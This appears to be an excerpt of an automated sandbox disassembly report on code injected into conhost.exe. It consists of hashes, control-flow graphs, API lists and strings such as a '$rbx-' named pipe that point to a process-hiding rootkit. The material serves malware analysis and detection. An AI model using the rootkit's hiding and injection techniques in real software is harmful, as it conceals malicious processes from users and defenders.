                                                  • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction ID: 84db21b620b9754859a015ae8d2ddfb1055a04da7a8c0ad90895f04f7d9eaa9c
                                                  • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction Fuzzy Hash: F731A03AB05F4197FB21DF52A80C759B3A0F788BD9F448665DE4A43A24EF38C856C741

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                  • API String ID: 1943346504-3507739905
                                                  • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction ID: 50fdc1c5f1c3a211b10cd7bbce97c1fb19189cf5b02384854fa77d5aaebfe272
                                                  • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction Fuzzy Hash: 78316B39716F418AFB20DF22A89CB59B7A0B784F98F448165DE4A43764EF38C846C701
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000003.2188000714.00000286D7CE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000286D7CE0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_3_286d7ce0000_conhost.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                  • Instruction ID: 6bed1bb26b7bdcff5c8bc5524321704267e5b62ef3aa67574b1af55792dad4b2
                                                  • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                  • Instruction Fuzzy Hash: 19D1C27A7017888EEB60DF65D48E3AD37A4F745788F109115EE8997B96DF38C082C702

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 313 286d7d1a22c-286d7d1a294 call 286d7d1b144 316 286d7d1a29a-286d7d1a29d 313->316 317 286d7d1a6f5-286d7d1a6fb call 286d7d1c388 313->317 316->317 318 286d7d1a2a3-286d7d1a2a9 316->318 320 286d7d1a378-286d7d1a38a 318->320 321 286d7d1a2af-286d7d1a2b3 318->321 323 286d7d1a390-286d7d1a394 320->323 324 286d7d1a645-286d7d1a649 320->324 321->320 325 286d7d1a2b9-286d7d1a2c4 321->325 323->324 328 286d7d1a39a-286d7d1a3a5 323->328 326 286d7d1a64b-286d7d1a652 324->326 327 286d7d1a682-286d7d1a68c call 286d7d19324 324->327 325->320 329 286d7d1a2ca-286d7d1a2cf 325->329 326->317 330 286d7d1a658-286d7d1a67d call 286d7d1a6fc 326->330 327->317 341 286d7d1a68e-286d7d1a6ad call 286d7d18070 327->341 328->324 332 286d7d1a3ab-286d7d1a3af 328->332 329->320 333 286d7d1a2d5-286d7d1a2df call 286d7d19324 329->333 330->327 337 286d7d1a575-286d7d1a581 332->337 338 286d7d1a3b5-286d7d1a3f0 call 286d7d19704 332->338 333->341 344 286d7d1a2e5-286d7d1a310 call 286d7d19324 * 2 call 286d7d19a0c 333->344 337->327 342 286d7d1a587-286d7d1a58b 337->342 338->337 349 286d7d1a3f6-286d7d1a3ff 338->349 346 286d7d1a59b-286d7d1a5a3 342->346 347 286d7d1a58d-286d7d1a599 call 286d7d199cc 342->347 380 286d7d1a330-286d7d1a33a call 286d7d19324 344->380 381 286d7d1a312-286d7d1a316 344->381 346->327 348 286d7d1a5a9-286d7d1a5b6 call 286d7d195a4 346->348 347->346 357 286d7d1a5bc-286d7d1a5c4 347->357 348->327 348->357 354 286d7d1a403-286d7d1a435 349->354 359 286d7d1a568-286d7d1a56f 354->359 360 286d7d1a43b-286d7d1a447 354->360 362 286d7d1a6d8-286d7d1a6f4 call 286d7d19324 * 2 call 286d7d1c2f4 357->362 363 286d7d1a5ca-286d7d1a5ce 357->363 359->337 359->354 360->359 364 286d7d1a44d-286d7d1a46c 360->364 362->317 366 286d7d1a5e1 363->366 367 286d7d1a5d0-286d7d1a5df call 286d7d199cc 363->367 368 286d7d1a558-286d7d1a55d 364->368 369 286d7d1a472-286d7d1a4af call 286d7d199e0 * 2 364->369 376 286d7d1a5e3-286d7d1a5ed call 286d7d1b1dc 366->376 367->376 368->359 393 286d7d1a4e2-286d7d1a4e5 369->393 376->327 391 286d7d1a5f3-286d7d1a643 call 286d7d19634 call 286d7d19838 376->391 380->320 396 286d7d1a33c-286d7d1a35c call 286d7d19324 * 2 call 286d7d1b1dc 380->396 381->380 385 286d7d1a318-286d7d1a323 381->385 385->380 390 286d7d1a325-286d7d1a32a 385->390 390->317 390->380 391->327 398 286d7d1a4e7-286d7d1a4ee 393->398 399 286d7d1a4b1-286d7d1a4d7 call 286d7d199e0 call 286d7d1a96c 393->399 418 286d7d1a35e-286d7d1a368 call 286d7d1b2cc 396->418 419 286d7d1a373 396->419 403 286d7d1a55f 398->403 404 286d7d1a4f0-286d7d1a4f4 398->404 414 286d7d1a4f9-286d7d1a556 call 286d7d1a158 399->414 415 286d7d1a4d9-286d7d1a4dc 399->415 408 286d7d1a564 403->408 404->369 408->359 414->408 415->393 423 286d7d1a36e-286d7d1a6d1 call 286d7d18f84 call 286d7d1ad28 call 286d7d19178 418->423 424 286d7d1a6d2-286d7d1a6d7 call 286d7d1c2f4 418->424 419->320 423->424 424->362
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction ID: 49c538d9f274928a7a15f106f246729a10ecaad517e54f769904ce9b8c6ea64c
                                                  • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction Fuzzy Hash: EAD1AD7A706B808AEB20DF75D44C39D77A0F785B98F108216EE8957B9ADF38C581C702

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 434 286d7d1104c-286d7d110b9 RegQueryInfoKeyW 435 286d7d110bf-286d7d110c9 434->435 436 286d7d111b5-286d7d111d0 434->436 435->436 437 286d7d110cf-286d7d1111f RegEnumValueW 435->437 438 286d7d111a5-286d7d111af 437->438 439 286d7d11125-286d7d1112a 437->439 438->436 438->437 439->438 440 286d7d1112c-286d7d11135 439->440 441 286d7d11147-286d7d1114c 440->441 442 286d7d11137 440->442 444 286d7d11199-286d7d111a3 441->444 445 286d7d1114e-286d7d11193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 441->445 443 286d7d1113b-286d7d1113f 442->443 443->438 446 286d7d11141-286d7d11145 443->446 444->438 445->444 446->441 446->443
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                  • String ID: d
                                                  • API String ID: 3743429067-2564639436
                                                  • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                  • Instruction ID: abfed3858995a180f9d24efc7e382adbbe90bf586b89948eee518cff946b9889
                                                  • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                  • Instruction Fuzzy Hash: AD415C37215B84DAE760CF21E44C79EB7A1F388B98F448129DA8A07B58DF39C589CB51

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                  • String ID: \\.\pipe\$rbx-childproc
                                                  • API String ID: 166002920-1828357524
                                                  • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction ID: 36f37a685392f0846ca6968756017cddc7f219cdfe43ada4cf4565d9af43ecbb
                                                  • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction Fuzzy Hash: 56115E3A719B4083F7208B21F95DB5A7761F389BD4F948315EA5A02BA8DF7CC145CB41
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000003.2188000714.00000286D7CE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000286D7CE0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_3_286d7ce0000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction ID: 04fa1f497b0d436201064a6d981f0fa5178cfbea8544f8ed5d88852615694ca1
                                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction Fuzzy Hash: 968190397037498EFB64AB65A84F39DA2D1EB86780F44C0259A09C7796DF38C947C703

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 452 286d7d17c50-286d7d17c56 453 286d7d17c58-286d7d17c5b 452->453 454 286d7d17c91-286d7d17c9b 452->454 456 286d7d17c5d-286d7d17c60 453->456 457 286d7d17c85-286d7d17cc4 call 286d7d182f0 453->457 455 286d7d17db8-286d7d17dcd 454->455 461 286d7d17ddc-286d7d17df6 call 286d7d18184 455->461 462 286d7d17dcf 455->462 459 286d7d17c78 __scrt_dllmain_crt_thread_attach 456->459 460 286d7d17c62-286d7d17c65 456->460 474 286d7d17cca-286d7d17cdf call 286d7d18184 457->474 475 286d7d17d92 457->475 463 286d7d17c7d-286d7d17c84 459->463 465 286d7d17c67-286d7d17c70 460->465 466 286d7d17c71-286d7d17c76 call 286d7d18234 460->466 472 286d7d17df8-286d7d17e29 call 286d7d182ac call 286d7d1814c call 286d7d18634 call 286d7d18450 call 286d7d18474 call 286d7d182dc 461->472 473 286d7d17e2b-286d7d17e5c call 286d7d184b0 461->473 467 286d7d17dd1-286d7d17ddb 462->467 466->463 472->467 484 286d7d17e6d-286d7d17e73 473->484 485 286d7d17e5e-286d7d17e64 473->485 487 286d7d17daa-286d7d17db7 call 286d7d184b0 474->487 488 286d7d17ce5-286d7d17cf6 call 286d7d181f4 474->488 478 286d7d17d94-286d7d17da9 475->478 490 286d7d17eb5-286d7d17ecb call 286d7d13a1c 484->490 491 286d7d17e75-286d7d17e7f 484->491 485->484 489 286d7d17e66-286d7d17e68 485->489 487->455 504 286d7d17d47-286d7d17d51 call 286d7d18450 488->504 505 286d7d17cf8-286d7d17d1c call 286d7d185f8 call 286d7d1813c call 286d7d18168 call 286d7d1b428 488->505 495 286d7d17f52-286d7d17f5f 489->495 513 286d7d17ecd-286d7d17ecf 490->513 514 286d7d17f03-286d7d17f05 490->514 496 286d7d17e86-286d7d17e8c 491->496 497 286d7d17e81-286d7d17e84 491->497 502 286d7d17e8e-286d7d17e94 496->502 497->502 509 286d7d17f48-286d7d17f50 502->509 510 286d7d17e9a-286d7d17eaf call 286d7d17c50 502->510 504->475 527 286d7d17d53-286d7d17d5f call 286d7d184a0 504->527 505->504 554 286d7d17d1e-286d7d17d25 __scrt_dllmain_after_initialize_c 505->554 509->495 510->490 510->509 513->514 515 286d7d17ed1-286d7d17ef3 call 286d7d13a1c call 286d7d17db8 513->515 518 286d7d17f07-286d7d17f0a 514->518 519 286d7d17f0c-286d7d17f21 call 286d7d17c50 514->519 515->514 548 286d7d17ef5-286d7d17efa 515->548 518->509 518->519 519->509 537 286d7d17f23-286d7d17f2d 519->537 544 286d7d17d61-286d7d17d6b call 286d7d183b8 527->544 545 286d7d17d85-286d7d17d90 527->545 542 286d7d17f2f-286d7d17f32 537->542 543 286d7d17f34-286d7d17f42 537->543 549 286d7d17f44 542->549 543->549 544->545 553 286d7d17d6d-286d7d17d7b 544->553 545->478 548->514 549->509 553->545 554->504 555 286d7d17d27-286d7d17d44 call 286d7d1b3f0 554->555 555->504
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction ID: 67a902cb688c193513fe44a82715359f62962eac3d08b576ea781e36d422a8a5
                                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction Fuzzy Hash: 4881283D7073058AFB60EB65D44D3A966D1ABA57B4F68C024AD09473A7DF38C842C303

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 558 286d7d19aac-286d7d19aea 559 286d7d19b9e 558->559 560 286d7d19af0-286d7d19af3 558->560 561 286d7d19ba0-286d7d19bbc 559->561 560->561 562 286d7d19af9-286d7d19afc 560->562 563 286d7d19b96 562->563 564 286d7d19b02-286d7d19b11 562->564 563->559 565 286d7d19b1e-286d7d19b3d LoadLibraryExW 564->565 566 286d7d19b13-286d7d19b16 564->566 569 286d7d19bbd-286d7d19bd2 565->569 570 286d7d19b3f-286d7d19b48 GetLastError 565->570 567 286d7d19bdd-286d7d19bec GetProcAddress 566->567 568 286d7d19b1c 566->568 567->563 572 286d7d19bee-286d7d19bf9 567->572 573 286d7d19b89-286d7d19b90 568->573 569->567 571 286d7d19bd4-286d7d19bd7 FreeLibrary 569->571 574 286d7d19b77-286d7d19b81 570->574 575 286d7d19b4a-286d7d19b5f call 286d7d1c4d8 570->575 571->567 572->561 573->563 573->564 574->573 575->574 578 286d7d19b61-286d7d19b75 LoadLibraryExW 575->578 578->569 578->574
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,?,00000286D7D19C6B,?,?,?,00000286D7D1945C,?,?,?,?,00000286D7D18F65), ref: 00000286D7D19B31
                                                  • GetLastError.KERNEL32(?,?,?,00000286D7D19C6B,?,?,?,00000286D7D1945C,?,?,?,?,00000286D7D18F65), ref: 00000286D7D19B3F
                                                  • LoadLibraryExW.KERNEL32(?,?,?,00000286D7D19C6B,?,?,?,00000286D7D1945C,?,?,?,?,00000286D7D18F65), ref: 00000286D7D19B69
                                                  • FreeLibrary.KERNEL32(?,?,?,00000286D7D19C6B,?,?,?,00000286D7D1945C,?,?,?,?,00000286D7D18F65), ref: 00000286D7D19BD7
                                                  • GetProcAddress.KERNEL32(?,?,?,00000286D7D19C6B,?,?,?,00000286D7D1945C,?,?,?,?,00000286D7D18F65), ref: 00000286D7D19BE3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction ID: f0188f5c7becbff5819978b271a445e2260325ab37ddd892b9837f85b760f15c
                                                  • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction Fuzzy Hash: 0B31CF39313B8091EE22DF16A98C7A927D4FB48BA4F598625ED1E4B794EF38C445C312
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction ID: 17009556d7e8c6057e17ceaf32a05bbe11f767524343631868a8f992ba611407
                                                  • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction Fuzzy Hash: 2D11C439311B8086E7608B52FC5CB1977A0F788FE4F408264EA5E87B94DF38C405C741
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Thread$Current$Context
                                                  • String ID:
                                                  • API String ID: 1666949209-0
                                                  • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                  • Instruction ID: e9c37d4e8d76c5be68c1e77b1dea35698f2fc3b4cae5ab4576a84ca99d02defe
                                                  • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                  • Instruction Fuzzy Hash: FCD18A7A309B8882DA70DB1AE49835A77B1F388B98F508116EECD477A9DF3CC551CB01
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Free$CurrentThread
                                                  • String ID:
                                                  • API String ID: 564911740-0
                                                  • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction ID: 5ec789d24f81da2a0e0e28f7d413bdf122b34961f5f48978cde41563df8ee1ad
                                                  • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction Fuzzy Hash: 3C51033C313F4685EF05DF28EC9D29823A1FB04748F84C815A92E067A9EF79D569C352
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID: $rbx-
                                                  • API String ID: 756756679-3661604363
                                                  • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction ID: d88c54b80e8b2d2bed6a9e02165b7adb7c035e998c04ed35f6ea6efbe8163ca3
                                                  • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction Fuzzy Hash: EA316A2A702F5596EA25DF26E94C769A3A0FB54B84F0AC020DF4947B65EF38C4A2C701
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$Value$FreeHeap
                                                  • String ID:
                                                  • API String ID: 365477584-0
                                                  • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction ID: d9d3101f8a586cadd2f9614159f46197d7e617b88e760b54fca558878f0fa247
                                                  • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction Fuzzy Hash: 1C11A52D70325042FA18A771691E37E2252AB85BA0F94C665EC6B6B7CAEF3CC401C303
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID:
                                                  • API String ID: 517849248-0
                                                  • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction ID: f866141e6c5fa2a78c69f847e738935b8caf16b38e64789451a649bf0307e5bb
